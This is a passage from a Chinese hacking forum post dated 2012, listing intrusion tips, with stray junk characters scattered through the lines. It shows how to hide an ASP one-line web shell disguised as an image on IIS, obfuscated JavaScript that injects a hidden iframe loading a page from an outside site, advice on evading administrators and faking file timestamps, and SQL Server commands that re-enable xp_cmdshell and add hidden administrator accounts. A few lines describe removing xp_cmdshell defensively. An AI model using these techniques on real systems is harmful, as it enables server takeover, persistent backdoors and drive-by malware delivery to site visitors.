, i8 f& ~ U7 X b4 Z) \5 f通过web访问ASP木马:http://ip/images../news.asp?action=login
; _) R# W& R$ @2 S6 ]" a如何删除非标准目录:rmdir images..\ /s2 o# |: y4 }! }
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: K6 w* o0 V8 W" W! t
mkdir programme.asp
8 b- ?, c5 d3 o. j( {* `& `新建1.txt文件内容:<!--#include file=”12.jpg”-->+ ^, ~; u2 ]* ?' S5 m8 T% o
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件0 `3 K6 g4 {0 {# P% F' y6 Z
attrib +H +S programme.asp
4 |1 y% X) `! \% b通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
F* l8 H% F6 c: c7 W$ ~' o8 U _- P! h' R
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。0 e# L& |% F% _
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
! Z( m3 R- W6 b5 K1 _
3 U& r! {; u6 }55、JS隐蔽挂马; [6 f' e6 ]& O9 X* I3 V9 s
1.
9 ?% @7 c9 c- l* v/ Qvar tr4c3="<iframe src=ht";/ ~. G$ H* b: d1 \7 | [7 h0 ^, L; O
tr4c3 = tr4c3+"tp:/";& g1 O. R' t# A: A
tr4c3 = tr4c3+"/ww";
! A# W/ C( r* @tr4c3 = tr4c3+"w.tr4";) N( P: s: ]6 Z2 \! L
tr4c3 = tr4c3+"c3.com/inc/m";: W0 F5 \7 k# |% v& K+ B; t
tr4c3 = tr4c3+"m.htm style="display:none"></i";
' Z% ]- N9 W% o8 R0 g8 `/ o& ktr4c3 =tr4c3+"frame>'";. q" @2 p. x; y# D Q" T/ K
document.write(tr4c3);1 N. {6 \( J }. a0 ~ [: S" S
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
, ?% X4 [8 `8 H0 s" _2 {' _6 v* }( u+ ~$ n9 y7 `2 Q2 J" t
2.
; x) W/ M# Q" o! O$ Z V转换进制,然后用EVAL执行。如
4 ~0 A0 @, M9 {2 K" u5 { g" _& q% N1 {- xeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
% r/ Y N, E( _+ W) S. x$ B, S不过这个有点显眼。
. @# m( T8 f# s: \8 \; G+ c3.3 Y" F$ U) n+ W9 z1 X
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');% O2 n; J( p" r7 I, @ ]
最后一点,别忘了把文件的时间也修改下。% F3 r& J( s6 J# }9 |. z
& I! j+ b6 [8 n6 ^) s \1 N2 T0 a7 b56.3389终端入侵常用DOS命令
$ ?: U5 ~" s0 utaskkill taskkill /PID 1248 /t) O/ j& v/ M) H& U M
0 h- e! g5 D$ M* Z1 ktasklist 查进程
( q, Q1 H- K( T ^# c( W' ?4 ?; {3 m1 ^" q
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
/ G9 C) h$ G8 z$ d/ K" riisreset /reboot% e2 t0 H& J$ D( J& E
tsshutdn /reboot /delay:1 重起服务器/ C: S4 h$ V2 V, _/ V
" I7 \ I! D7 ]( d( K8 n! z
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户, {' }: B$ Y/ x# v
# Y. c5 `* `7 j( N0 I1 ^
query user 查看当前终端用户在线情况' ^/ \" u; E/ M% s3 N% \. J8 I4 |' X) u
& o a- c# x, c5 y9 c要显示有关所有会话使用的进程的信息,请键入:query process *
5 E6 X- {' }# i# @/ C
0 c9 U* O t: P: F要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
0 y2 [; `1 Q/ \# F' k( p, K4 a+ J2 a4 L" C0 \
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
/ @9 u# \, W7 Y) t; o7 K) b$ `; f/ l5 n
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
# a" ~$ }. W: t, F; k! r
3 w# b+ G+ p( n8 P' d: A7 ~* Q- n# N命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
1 C2 }' {3 q; G5 W9 P' P4 r
! J3 I" t$ m' h6 c) z1 i命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
% H( U. X1 v' E. K# e9 \5 a1 v5 g
* ]6 T7 ^8 g6 p$ `( ]命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
0 t9 t+ b t u/ B0 P, _7 t1 s3 o+ P/ P, |) C4 C' m$ ^5 s6 x. w
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机5 F, {: N# k) b; l0 v7 O) `
0 H8 g+ k" h& Y, U7 Q# e2 ^56、在地址栏或按Ctrl+O,输入:
0 |( S" y+ B( i1 B: g% ~javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;9 e6 ~% l' n( a
r+ O( E, Z( O, f2 G源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。( X3 _+ Q% \- D. H3 K# N' f
6 z; C) J5 M9 S. \7 x57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
3 b, `( j7 @; J: H0 o用net localgroup administrators是可以看到管理组下,加了$的用户的。
8 U5 s* M3 X3 w5 v
3 a6 d" X' ~; p+ `58、 sa弱口令相关命令
0 R; J2 w) Z$ z$ }& e1 B6 t- I$ [) K# _1 I) T1 N# U
一.更改sa口令方法:
7 [7 `, D# j9 n& t用sql综合利用工具连接后,执行命令:. ?2 i) D. r3 o. z& S
exec sp_password NULL,'20001001','sa'+ D2 i: F1 A( e: y' O
(提示:慎用!)
' C/ v+ B, M7 D Q* a4 x1 G* `- a- a4 a1 ~
二.简单修补sa弱口令.
+ ]( q$ q* Y: u
8 K8 K; U3 c1 \6 O9 U! u( S+ K, r方法1:查询分离器连接后执行:
e) p7 q q4 B. S A* sif exists (select * from
" D+ m8 O) b' c: ? l* j6 K- \dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
1 J) K7 q& a: _2 K( E' ROBJECTPROPERTY(id, N'IsExtendedProc') = 1)
) Q$ q. e/ v4 n6 _3 s% v0 R, T' Y( a
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'- p" k8 n; o. W7 @9 j B" Y1 _
& z1 \ B8 O' O* }9 ^9 [
GO( H3 c2 m! o& M2 T) u, u
0 H) a4 w/ s9 r9 I% i然后按F5键命令执行完毕7 d- F5 r" {% Q5 |5 x
3 `* P/ g- P& n( `/ c# K方法2:查询分离器连接后8 b. v# o* U5 _" B3 i9 l. g
第一步执行:use master
3 L4 i% |+ q2 |* s% F1 {4 U第二步执行:sp_dropextendedproc 'xp_cmdshell'
$ z( }) ^! X, N* e' f3 Z& e6 z然后按F5键命令执行完毕" x/ W% Q' k) { m' k
% C# v* E& S; C! g
" B8 _. Z: H/ ?$ a* B3 L7 O3 y* L
三.常见情况恢复执行xp_cmdshell.6 e3 }% `! y5 Z" Y3 J% G& T
6 S U; T, L( [4 D5 F
3 D, `4 Z2 N; [2 q1 未能找到存储过程'master..xpcmdshell'.
% M" j0 ^( [( K. X, p0 x 恢复方法:查询分离器连接后,
9 y. [4 m- U1 p @! \. W第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
2 v, s$ A! E* s. r! W' G/ E( y' S第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( @; H. |; O0 n$ c然后按F5键命令执行完毕
9 S- P8 k8 l2 A( t, J
) s& M- G$ L( q {! u$ [( {2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)' d4 j: v# R, `8 j$ }
恢复方法:查询分离器连接后,
# Q& K7 M0 ]3 Q! y. F; q第一步执行:sp_dropextendedproc "xp_cmdshell"' c0 u9 T9 p/ \$ W
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0 x% A+ g, z0 \* f4 Z) [# N4 g- b然后按F5键命令执行完毕+ W, U. [5 s$ W2 T
: e0 O$ h* J4 X v
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( k6 K$ f0 ]- l" W. x! @
恢复方法:查询分离器连接后,# [. P$ A) |8 F6 }0 I- N* I& ]
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 U/ J3 x; Z% O第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
* e/ Q5 i/ j( V/ P: |然后按F5键命令执行完毕
( `/ _1 E3 L& N4 Z6 l* d; G4 r! l9 h3 Y9 N- W% l$ z$ \
四.终极方法.# @) H1 _1 N( ]0 e/ e
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
6 q6 K4 ]; \2 y' h, c2 b查询分离器连接后,
" @9 |1 P2 B, s; Q* ?; Z4 Q( Z& [2000servser系统:
4 H; D* q- r; U; v( Vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'- V% v5 d. c) ^/ c$ b+ ~
1 ~8 @2 p c) B& k$ ^7 ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add', r. {9 i( f, |/ k9 r \7 n
* r$ D/ g& G. ?0 S( k
xp或2003server系统:4 I- A) D$ b: k& C4 l% ^
& ]6 k9 [: S5 L1 \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'' q) x) }% l" d
: N! h% P# p+ ]9 Q& x; U: ^declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
9 ?, @- H0 Q x4 T4 m; h8 @8 ` |
发表于 2012-9-15 14:51:03
收藏
支持
反对